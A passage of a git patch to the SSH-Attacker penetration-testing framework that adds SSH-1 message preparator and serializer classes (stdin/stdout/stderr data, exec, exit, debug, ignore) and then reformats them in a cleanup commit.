getObject().setIgnoreReason("DummyValue"); + } + LOGGER.debug(getObject().getIgnoreMessage().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/StderrDataMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/StderrDataMessageSSHV1Preparator.java new file mode 100644 index 000000000..854d64421 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/StderrDataMessageSSHV1Preparator.java @@ -0,0 +1,39 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; +import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.StderrDataMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.StdinDataMessageSSH1; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class StderrDataMessageSSHV1Preparator extends SshMessagePreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + + private SshPublicKey serverKey; + + public StderrDataMessageSSHV1Preparator(Chooser chooser, StderrDataMessageSSH1 message) { + super(chooser, message, MessageIdConstantSSH1.SSH_SMSG_STDERR_DATA); + } + + @Override + public void prepareMessageSpecificContents() { + LOGGER.debug("Preparring now..."); + if (getObject().getData() == null) { + getObject().setData("DummyValue"); + } + LOGGER.debug(getObject().getData().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/StdinDataMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/StdinDataMessageSSHV1Preparator.java new file mode 100644 index 000000000..38003b3fd --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/StdinDataMessageSSHV1Preparator.java @@ -0,0 +1,39 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; +import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.DebugMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.StdinDataMessageSSH1; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class StdinDataMessageSSHV1Preparator extends SshMessagePreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + + private SshPublicKey serverKey; + + public StdinDataMessageSSHV1Preparator(Chooser chooser, StdinDataMessageSSH1 message) { + super(chooser, message, MessageIdConstantSSH1.SSH_CMSG_STDIN_DATA); + } + + @Override + public void prepareMessageSpecificContents() { + LOGGER.debug("Preparring now..."); + if (getObject().getData() == null) { + getObject().setData("DummyValue"); + } + LOGGER.debug(getObject().getData().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/StdoutDataMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/StdoutDataMessageSSHV1Preparator.java new file mode 100644 index 000000000..53929445b --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/StdoutDataMessageSSHV1Preparator.java @@ -0,0 +1,39 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; +import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.StdinDataMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.StdoutDataMessageSSH1; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class StdoutDataMessageSSHV1Preparator extends SshMessagePreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + + private SshPublicKey serverKey; + + public StdoutDataMessageSSHV1Preparator(Chooser chooser, StdoutDataMessageSSH1 message) { + super(chooser, message, MessageIdConstantSSH1.SSH_SMSG_STDOUT_DATA); + } + + @Override + public void prepareMessageSpecificContents() { + LOGGER.debug("Preparring now..."); + if (getObject().getData() == null) { + getObject().setData("DummyValue"); + } + LOGGER.debug(getObject().getData().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/DebugMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/DebugMessageSSHV1Serializier.java new file mode 100644 index 000000000..49e5353c7 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/DebugMessageSSHV1Serializier.java @@ -0,0 +1,39 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.sshattacker.core.constants.DataFormatConstants; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.DebugMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.nio.charset.StandardCharsets; + +public class DebugMessageSSHV1Serializier extends SshMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + public DebugMessageSSHV1Serializier(DebugMessageSSH1 message) { + super(message); + } + + private void serializeReason() { + LOGGER.debug("Description length: " + message.getDebugMessage().getValue()); + appendInt( + message.getDebugMessage().getValue().length(), + DataFormatConstants.STRING_SIZE_LENGTH); + LOGGER.debug("Description: " + message.getDebugMessage().getValue()); + appendString(message.getDebugMessage().getValue(), StandardCharsets.UTF_8); + } + + @Override + public void serializeMessageSpecificContents() { + serializeReason(); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/EofMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/EofMessageSSHV1Serializier.java new file mode 100644 index 000000000..cf9df5286 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/EofMessageSSHV1Serializier.java @@ -0,0 +1,26 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.EofMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.SuccessMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class EofMessageSSHV1Serializier extends SshMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + public EofMessageSSHV1Serializier(EofMessageSSH1 message) { + super(message); + } + + @Override + public void serializeMessageSpecificContents() {} +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ExecCmdMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ExecCmdMessageSSHV1Serializier.java new file mode 100644 index 000000000..a33fe76cd --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ExecCmdMessageSSHV1Serializier.java @@ -0,0 +1,40 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.sshattacker.core.constants.DataFormatConstants; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.DebugMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExecCmdMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.nio.charset.StandardCharsets; + +public class ExecCmdMessageSSHV1Serializier extends SshMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + public ExecCmdMessageSSHV1Serializier(ExecCmdMessageSSH1 message) { + super(message); + } + + private void serializeReason() { + LOGGER.debug("Description length: " + message.getCommand().getValue()); + appendInt( + message.getCommand().getValue().length(), + DataFormatConstants.STRING_SIZE_LENGTH); + LOGGER.debug("Description: " + message.getCommand().getValue()); + appendString(message.getCommand().getValue(), StandardCharsets.UTF_8); + } + + @Override + public void serializeMessageSpecificContents() { + serializeReason(); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ExecShellMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ExecShellMessageSSHV1Serializier.java new file mode 100644 index 000000000..61ca8f31e --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ExecShellMessageSSHV1Serializier.java @@ -0,0 +1,25 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExecShellMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class ExecShellMessageSSHV1Serializier extends SshMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + public ExecShellMessageSSHV1Serializier(ExecShellMessageSSH1 message) { + super(message); + } + + @Override + public void serializeMessageSpecificContents() {} +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ExitConfirmationMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ExitConfirmationMessageSSHV1Serializier.java new file mode 100644 index 000000000..4d2cbe6fd --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ExitConfirmationMessageSSHV1Serializier.java @@ -0,0 +1,26 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.EofMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitConfirmationMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class ExitConfirmationMessageSSHV1Serializier extends SshMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + public ExitConfirmationMessageSSHV1Serializier(ExitConfirmationMessageSSH1 message) { + super(message); + } + + @Override + public void serializeMessageSpecificContents() {} +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ExitStatusMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ExitStatusMessageSSHV1Serializier.java new file mode 100644 index 000000000..2b6080a54 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ExitStatusMessageSSHV1Serializier.java @@ -0,0 +1,37 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.sshattacker.core.constants.DataFormatConstants; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitConfirmationMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitStatusMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.nio.charset.StandardCharsets; + +public class ExitStatusMessageSSHV1Serializier extends SshMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + public ExitStatusMessageSSHV1Serializier(ExitStatusMessageSSH1 message) { + super(message); + } + + private void serializeExitStatus() { + LOGGER.debug("Exit Status: " + message.getExitStatus().getValue()); + appendInt(message.getExitStatus().getValue(),DataFormatConstants.UINT32_SIZE); + } + + + @Override + public void serializeMessageSpecificContents() { + serializeExitStatus(); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/IgnoreMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/IgnoreMessageSSHV1Serializier.java new file mode 100644 index 000000000..d30b749ef --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/IgnoreMessageSSHV1Serializier.java @@ -0,0 +1,39 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.sshattacker.core.constants.DataFormatConstants; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.IgnoreMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.nio.charset.StandardCharsets; + +public class IgnoreMessageSSHV1Serializier extends SshMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + public IgnoreMessageSSHV1Serializier(IgnoreMessageSSH1 message) { + super(message); + } + + private void serializeReason() { + LOGGER.debug("Description length: " + message.getIgnoreMessage().getValue()); + appendInt( + message.getIgnoreMessage().getValue().length(), + DataFormatConstants.STRING_SIZE_LENGTH); + LOGGER.debug("Description: " + message.getIgnoreMessage().getValue()); + appendString(message.getIgnoreMessage().getValue(), StandardCharsets.UTF_8); + } + + @Override + public void serializeMessageSpecificContents() { + serializeReason(); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/StderrDataMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/StderrDataMessageSSHV1Serializier.java new file mode 100644 index 000000000..3ee71daa4 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/StderrDataMessageSSHV1Serializier.java @@ -0,0 +1,40 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.sshattacker.core.constants.DataFormatConstants; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.StderrDataMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.StdinDataMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.nio.charset.StandardCharsets; + +public class StderrDataMessageSSHV1Serializier extends SshMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + public StderrDataMessageSSHV1Serializier(StderrDataMessageSSH1 message) { + super(message); + } + + private void serializeReason() { + LOGGER.debug("Description length: " + message.getData().getValue()); + appendInt( + message.getData().getValue().length(), + DataFormatConstants.STRING_SIZE_LENGTH); + LOGGER.debug("Description: " + message.getData().getValue()); + appendString(message.getData().getValue(), StandardCharsets.UTF_8); + } + + @Override + public void serializeMessageSpecificContents() { + serializeReason(); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/StdinDataMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/StdinDataMessageSSHV1Serializier.java new file mode 100644 index 000000000..b4d35af61 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/StdinDataMessageSSHV1Serializier.java @@ -0,0 +1,40 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.sshattacker.core.constants.DataFormatConstants; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.DebugMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.StdinDataMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.nio.charset.StandardCharsets; + +public class StdinDataMessageSSHV1Serializier extends SshMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + public StdinDataMessageSSHV1Serializier(StdinDataMessageSSH1 message) { + super(message); + } + + private void serializeReason() { + LOGGER.debug("Description length: " + message.getData().getValue()); + appendInt( + message.getData().getValue().length(), + DataFormatConstants.STRING_SIZE_LENGTH); + LOGGER.debug("Description: " + message.getData().getValue()); + appendString(message.getData().getValue(), StandardCharsets.UTF_8); + } + + @Override + public void serializeMessageSpecificContents() { + serializeReason(); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/StdoutDataMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/StdoutDataMessageSSHV1Serializier.java new file mode 100644 index 000000000..8e576050a --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/StdoutDataMessageSSHV1Serializier.java @@ -0,0 +1,40 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.sshattacker.core.constants.DataFormatConstants; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.StdinDataMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.StdoutDataMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.nio.charset.StandardCharsets; + +public class StdoutDataMessageSSHV1Serializier extends SshMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + public StdoutDataMessageSSHV1Serializier(StdoutDataMessageSSH1 message) { + super(message); + } + + private void serializeReason() { + LOGGER.debug("Description length: " + message.getData().getValue()); + appendInt( + message.getData().getValue().length(), + DataFormatConstants.STRING_SIZE_LENGTH); + LOGGER.debug("Description: " + message.getData().getValue()); + appendString(message.getData().getValue(), StandardCharsets.UTF_8); + } + + @Override + public void serializeMessageSpecificContents() { + serializeReason(); + } +} From dfa2937bc73bebabe50944600bbfb7c10f97f8a7 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Tue, 27 Feb 2024 16:30:48 +0100 Subject: [PATCH 141/176] Reformating and automatic build cleanup --- .../core/constants/KeyExchangeAlgorithm.java | 1 - .../nds/sshattacker/core/layer/impl/SSH1Layer.java | 2 -- .../ssh1/handler/DebugMessageSSHV1Handler.java | 6 ++---- .../ssh1/handler/EofMessageSSHV1Handler.java | 2 -- .../ssh1/handler/ExecCmdMessageSSHV1Handler.java | 6 ++---- .../handler/ExitConfirmationMessageSSHV1Handler.java | 4 ++-- .../ssh1/handler/ExitStatusMessageSSHV1Handler.java | 7 +------ .../ssh1/handler/IgnoreMessageSSHV1Handler.java | 7 ++----- .../ssh1/handler/StderrDataMessageSSHV1Handler.java | 8 ++------ .../ssh1/handler/StdinDataMessageSSHV1Handler.java | 7 ++----- .../ssh1/handler/StdoutDataMessageSSHV1Handler.java | 7 ++----- .../core/protocol/ssh1/message/DebugMessageSSH1.java | 7 ++----- .../core/protocol/ssh1/message/EofMessageSSH1.java | 5 ----- .../protocol/ssh1/message/ExecCmdMessageSSH1.java | 11 ++--------- .../protocol/ssh1/message/ExecShellMessageSSH1.java | 8 ++------ .../ssh1/message/ExitConfirmationMessageSSH1.java | 8 ++------ .../protocol/ssh1/message/ExitStatusMessageSSH1.java | 12 +++--------- .../protocol/ssh1/message/IgnoreMessageSSH1.java | 8 ++------ .../protocol/ssh1/message/StderrDataMessageSSH1.java | 8 +------- .../protocol/ssh1/message/StdinDataMessageSSH1.java | 8 +------- .../protocol/ssh1/message/StdoutDataMessageSSH1.java | 8 +------- .../ssh1/parser/DebugMessageSSHv1Parser.java | 5 ++--- .../protocol/ssh1/parser/EofMessageSSHV1Parser.java | 4 +--- .../ssh1/parser/ExecCmdMessageSSHv1Parser.java | 6 ++---- .../ssh1/parser/ExecShellMessageSSHV1Parser.java | 4 +--- .../parser/ExitConfirmationMessageSSHV1Parser.java | 7 +++---- .../ssh1/parser/ExitStatusMessageSSHV1Parser.java | 4 +--- .../ssh1/parser/IgnoreMessageSSHV1Parser.java | 7 ++----- .../ssh1/parser/StderrDataMessageSSHv1Parser.java | 6 ++---- .../ssh1/parser/StdinDataMessageSSHv1Parser.java | 6 ++---- .../ssh1/parser/StdoutDataMessageSSHv1Parser.java | 6 ++---- .../ssh1/preparator/EofMessageSSHV1Preparator.java | 1 - .../preparator/ExecCmdMessageSSHV1Preparator.java | 1 - .../ExitConfirmationMessageSSHV1Preparator.java | 7 ++++--- .../preparator/ExitStatusMessageSSHV1Preparator.java | 1 - .../preparator/StderrDataMessageSSHV1Preparator.java | 1 - .../preparator/StdinDataMessageSSHV1Preparator.java | 1 - .../preparator/StdoutDataMessageSSHV1Preparator.java | 1 - .../serializer/DebugMessageSSHV1Serializier.java | 3 +-- .../ssh1/serializer/EofMessageSSHV1Serializier.java | 1 - .../serializer/ExecCmdMessageSSHV1Serializier.java | 8 ++------ .../ExitConfirmationMessageSSHV1Serializier.java | 4 ++-- .../ExitStatusMessageSSHV1Serializier.java | 6 +----- .../serializer/IgnoreMessageSSHV1Serializier.java | 3 +-- .../StderrDataMessageSSHV1Serializier.java | 8 ++------ .../serializer/StdinDataMessageSSHV1Serializier.java | 8 ++------ .../StdoutDataMessageSSHV1Serializier.java | 8 ++------ .../factory/WorkflowConfigurationFactory.java | 9 +++++---- 48 files changed, 71 insertions(+), 195 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/KeyExchangeAlgorithm.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/KeyExchangeAlgorithm.java index a60c125a4..dbac1a58d 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/KeyExchangeAlgorithm.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/KeyExchangeAlgorithm.java @@ -86,7 +86,6 @@ public enum KeyExchangeAlgorithm { RSA1024_SHA1(KeyExchangeFlowType.RSA, "rsa1024-sha1", "SHA-1"), RSA2048_SHA256(KeyExchangeFlowType.RSA, "rsa2048-sha256", "SHA-256"), - RSA1024_PCKS1(KeyExchangeFlowType.RSA, "rsa1024-pkcs1", "PKCS1"), // [ RFC 8308 ] EXT_INFO_S(null, "ext-info-s", null), EXT_INFO_C(null, "ext-info-c", null), diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java index ecef524d5..19a628013 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java @@ -27,7 +27,6 @@ import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.ssh1.message.*; import de.rub.nds.sshattacker.core.protocol.transport.message.AsciiMessage; -import de.rub.nds.sshattacker.core.protocol.transport.message.UnknownMessage; import de.rub.nds.sshattacker.core.protocol.transport.parser.AsciiMessageParser; import java.io.ByteArrayInputStream; import java.io.ByteArrayOutputStream; @@ -327,7 +326,6 @@ private void readDataFromStream(ProtocolMessage message, AbstractPacket pa readContainerFromStream(message, context, temp_stream); } - @Override public void receiveMoreData() throws IOException { try { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/DebugMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/DebugMessageSSHV1Handler.java index 8458f22a2..105c4fecc 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/DebugMessageSSHV1Handler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/DebugMessageSSHV1Handler.java @@ -23,9 +23,7 @@ public DebugMessageSSHV1Handler(SshContext context) { @Override public void adjustContext(DebugMessageSSH1 message) { - LOGGER.warn( - "Recieved a Ignore Message, Reason: {}", - message.getDebugMessage().getValue()); - sshContext.setDisconnectMessageReceived(true); + LOGGER.warn("Recieved a Debug Message, Reason: {}", message.getDebugMessage().getValue()); + // sshContext.setDisconnectMessageReceived(true); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/EofMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/EofMessageSSHV1Handler.java index 9d3fa058c..c3e66ad57 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/EofMessageSSHV1Handler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/EofMessageSSHV1Handler.java @@ -10,8 +10,6 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.ssh1.message.EofMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitConfirmationMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.SuccessMessageSSH1; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ExecCmdMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ExecCmdMessageSSHV1Handler.java index 5aaf4031a..ab989fb2e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ExecCmdMessageSSHV1Handler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ExecCmdMessageSSHV1Handler.java @@ -28,9 +28,7 @@ public ExecCmdMessageSSHV1Handler(SshContext context) { @Override public void adjustContext(ExecCmdMessageSSH1 message) { - 